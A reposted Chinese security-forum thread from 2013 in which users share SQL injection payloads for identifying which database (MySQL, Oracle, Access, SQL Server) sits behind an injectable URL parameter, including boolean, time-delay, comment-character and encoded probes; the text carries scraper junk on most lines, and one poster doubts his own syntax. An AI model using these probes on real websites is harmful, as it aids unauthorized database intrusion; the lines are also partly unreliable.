一个注射点如何最快速确认是什么类型数据库
" k9 Q0 {3 b- Z1 n8 p' h9 N' Vxsser (十根阳具有长短!!) | 2013-02-05 12:36
/ U* \0 D+ U2 H9 `1 b n# l* h假设这么一个注射点:
3 O" q" t2 `6 K% `' c, }% G& ^show.html?id=2/ ^- ~2 ^) m+ E% u+ F) I0 p
mysql:id=2 and version()>0
! o( u/ L2 f% L0 u+ | p% \/ Voracle:id=2 and '1'||'1'='11
# R0 H* w4 E' _: Q6 q i其他的欢迎补充# p' Z2 g9 d/ z# n
1#
+ X3 t; r' `1 r9 t3 Fupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
& x1 S6 m7 Z$ }9 F5 W+ bAccess:# h2 Y6 @( m$ H$ ?% h- L
aNd aSc(cHr(97))=97
! V/ F% D) Z; J4 V3 a7 V# Xand exists(select id from MSysAccessObjects)7 o7 B9 p: p1 F1 Z
SQL Server:
& V+ ] ^/ M- B3 Wand exists(select id from sysobjects)
5 |4 x" ?; h# ?+ Qand length(user)>0 k9 ~& T) @8 {" A6 x
MySQL:
, c2 Z N0 f9 ]0 _: ~. Eand length(user())>0
" ~& U7 k1 v1 H. B2#
/ b9 y0 _+ k5 s* U* ]& T" R) Z! j e, uxsser (十根阳具有长短!!) | 2013-02-05 12:48
- Y# l( z4 z, W* j@upload 如果这些都不是呢…
( \4 U7 Q' G7 c( T1 @3#
6 ~, w/ v5 L& E6 ~; Q8 supload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03( s0 V" N' I8 @; c$ \! d6 _& Z
@xsser 不快速的,延时注入
" z, a% c# {& [$ R- u! v0 B不知道这样写对不对0 Q. B- Q$ L$ N
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
- K" l: }% Q1 e2 h" a6 \mysql:id=2 and select benchmark(1e8,current_date());
- }* q% o! v8 X! H4#/ W" w9 R8 C- I* J" i9 S- {. z- R2 W
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
8 g' \! `9 a" e% ]最快的貌似是看报错信息5 E& R0 v* H1 {+ L) }
oracle error$ H1 g: \0 V# T5 ^' I
mssql error
. c4 B: u& c+ v S- z* @mysql error7 f& H* k7 l9 h0 z
5#' ]" U4 `1 R" E2 R: P1 Y6 y- B2 z6 _
Nimda (你们都是坏银~) | 2013-02-05 13:14
" W9 D' j! s+ O& |! p7 w' U" T小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)7 v4 T8 u7 o! T' A
6#
; Y; V1 Y* g3 O5 A% |2 r p7 Qupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
# E& x- O: Q; i& G/ \9 o“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:3 E) M4 |5 }5 T. U$ R- O
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
0 M: x1 Y$ s; O“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。4 v A; ~! n. r; R% W5 o8 y
7#
& ~' K Z4 a E+ r- U7 ~_Evil (HackEnd) | 2013-02-05 13:33" d5 r2 |& f9 O' H* l# }( ]
PostgreSQL0 |2 M7 P) a; O: e
8#
2 E0 W8 L* k% gupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42# t. \0 m- v( P. E- A1 L7 i! G
切换编码 and 1=1- p5 N- `) H5 _; [" F! d
oracle:
* y- y) C/ {, H% @2 \" {CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
- Y. \; A% n0 V: `mssql:) e! ]% Q1 a) U' n9 ?/ p
CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)
; M3 G) }9 T5 J: o& D+ _) dmysql:3 t9 Q5 Z- s+ C8 ~6 ?
CHAR(97, 110, 100, 32, 49, 61, 49)
* I) c: w1 W& q( S; V M7 V9#4 @4 ^ c2 e$ R0 s$ H
xsser (十根阳具有长短!!) | 2013-02-05 14:318 m" v3 x6 p/ \1 T
@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?, w! s4 Y* Q% A/ [8 }- i$ L' A" i
10#: c5 m$ [' X- R
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
6 Q. K, X% a4 h8 ^- Q, n1 Z2 ~4 U@xsser 是奇葩数据库类型的么?5 j* J. \+ O- l) K7 X: w
根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
* }2 o! l0 @! p% |& e1.是否可以使用特定的函数来判断,该数据库特有的( `( X. k( ?8 X1 H
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等& o+ S, k* Z+ M- N2 u/ H
3.是否可以编码查询1 m1 t D7 G5 S. H5 `
4.是否显可以利用错信息
2 q* x$ x! U; F" X+ p& O- H5.是否存在数据库某些特性辅助判断: I. G1 G4 ]0 O% A5 K* Q8 u
个人见解
4 k% n# \, l9 _$ `11#: M7 l! e( W+ ~9 U4 \' y e
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:559 S' z! Z) g/ ^: G X+ u0 p; i4 T
已收藏,mssql可以直接看到错误提示的吧~
1 v& x) ~. g% t6 I) C! f2 h1 p8 r12#0 |' u, \- R3 I
Passer_by | 2013-02-05 15:09
/ ^$ r% O+ _6 S0 d- y s+ I' t曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。8 }) j' l- P! G# N
from:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对